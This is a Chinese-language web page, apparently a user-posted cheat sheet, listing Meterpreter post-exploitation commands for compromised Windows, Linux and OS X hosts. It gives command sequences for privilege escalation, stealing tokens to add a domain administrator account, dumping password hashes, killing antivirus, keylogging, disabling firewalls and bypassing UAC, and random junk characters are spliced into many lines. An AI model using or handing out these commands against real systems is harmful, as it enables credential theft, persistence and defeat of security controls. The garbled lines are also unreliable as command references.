打开APP
userphoto
未登录

开通VIP,畅享免费电子书等14项超值服

开通VIP
Meterpreter后渗透攻击命令
在windows主机上使用meterpreter进行提权操作:: d' f+ E5 K% l& C/ Z  e7 F
           meterpreter > use priv
           meterpreter > getsystem
从一个给定的进程ID中窃取一个域管理员组令牌,添加一个域账户,并把域账户添加到域管理员组中:/ ^& `2 |3 A, ~/ b  p, z* S
          meterpreter > ps/ A$ e8 @" G) L# ^
          meterpreter > steal_token 1784- e& K4 N7 @9 Y- S
          meterpreter > shell" F& ], }  w+ S. {2 ~( ]
          C:\windows\system32>net user metasploit password /ADD /DOMAIN2 h6 \$ N3 [/ Z3 E  D* @7 e
          C:\windows\system32>net group "Domain Admins" metasploit /ADD /DOMAIN
从SAM数据库中导出密码的哈希值:) n( \( V1 O# y! n6 p
         meterpreter > use priv  n: M8 r+ z9 q3 r5 j/ |
         meterpreter > getsystem
         meterpreter > hashdump1 j* b2 q5 f- k# {/ \1 V
注意:在windows 2008 中,如果getsystem命令和hashdump命令抛出异常情况时,你需要迁移到一个以SYSTEM系统权限运行的进程中。
        自动迁移到一个独立进程:
        meterpreter > run migrate9 k4 L/ \2 x1 y( ]
通过meterpreter的killav脚本来杀死目标主机运行的杀毒软件:
        meterpreter > run killav
针对一个特定的进程捕获目标主机上的键盘记录:
        meterpreter > ps; U$ D" e, P% v% D1 B* k' y
        meterpreter > migrate 1436
        meterpreter >keyscan_start
        meterpreter >keyscan_dump, M  f# ?* ?0 z+ @$ y+ a3 a, r
        meterpreter >keyscan_stop+ _! w$ c. J/ ^# O
使用匿名方式来假冒管理员:' R1 H4 a5 v- @/ x
        meterpreter >use incognito
        meterpreter >list_tokens -u! J5 O, J0 y) {7 Q) g! u8 Z
        meterpreter >use priv3 s3 W' T# {- i& D) B
        meterpreter >getsystem, S0 c( b- O' l! {( U8 {' h6 {7 f
        meterpreter >list_tokens -u9 \9 a" y' K" ~; V# L. w6 F
        meterpreter >impersonate_token  IHAZSECURITY\\Administrator
查看目标主机都采用了那些防护措施,列出帮助菜单,关闭防火墙以及其它我们发现的防护措施:5 S% _8 M2 u6 t8 k* R! n( P/ a
        meterpreter >run getcountermeasure
        meterpreter >run getcountermeasuer -h3 \% j  N, ~$ l' Q; k0 F: J9 o
        meterpreter >run getcountermeasuer -d -k
识别被控制的主机是否是一台虚拟机:8 b. A$ X/ z, E6 ^
        meterpreter >run  checkvm) D9 f* X% N1 W) A, y
在一个meterpreter会话界面中使用cmd shell:+ @# j  n9 D6 O
       meterpreter >shell
获取目标主机的图形界面(VNC):
       meterpreter >run vnc5 ?0 I1 ]. g5 O& T
使正在运行的meterpreter界面在后台运行:' {0 `# S, L3 B- X6 \& r  \
       meterpreter >background& a3 s  i" k% N& d
绕过windows的用户账户控制(UAC)机制:
       meterpreter >run post/windows/escalate/bypassuac
导出苹果OS-X系统的口令哈希值:
       meterpreter >run post/osx/gather/hashdump0 R6 j0 L/ U  \' p, \' }( a
导出liunx系统的口令哈希值:  M9 [8 b& f: w/ X
       meterpreter >run post/linux/gather/hashdump; z6 W8 `- M/ P8 Z



本站仅提供存储服务,所有内容均由用户发布,如发现有害或侵权内容,请点击举报
打开APP,阅读全文并永久保存 查看更多类似文章
猜你喜欢
类似文章
meterpreter使用
利用metasploit绕过UAC的5种方式
手把手教你如何利用Meterpreter渗透Windows系统
【内网渗透】域渗透技巧
干货|windows提权速查流程 收藏备用
metasploit 手动提权
更多类似文章 >>
生活服务
热点新闻
分享 收藏 导长图 关注 下载文章
绑定账号成功
后续可登录账号畅享VIP特权!
如果VIP功能使用有故障,
可点击这里联系客服!

联系客服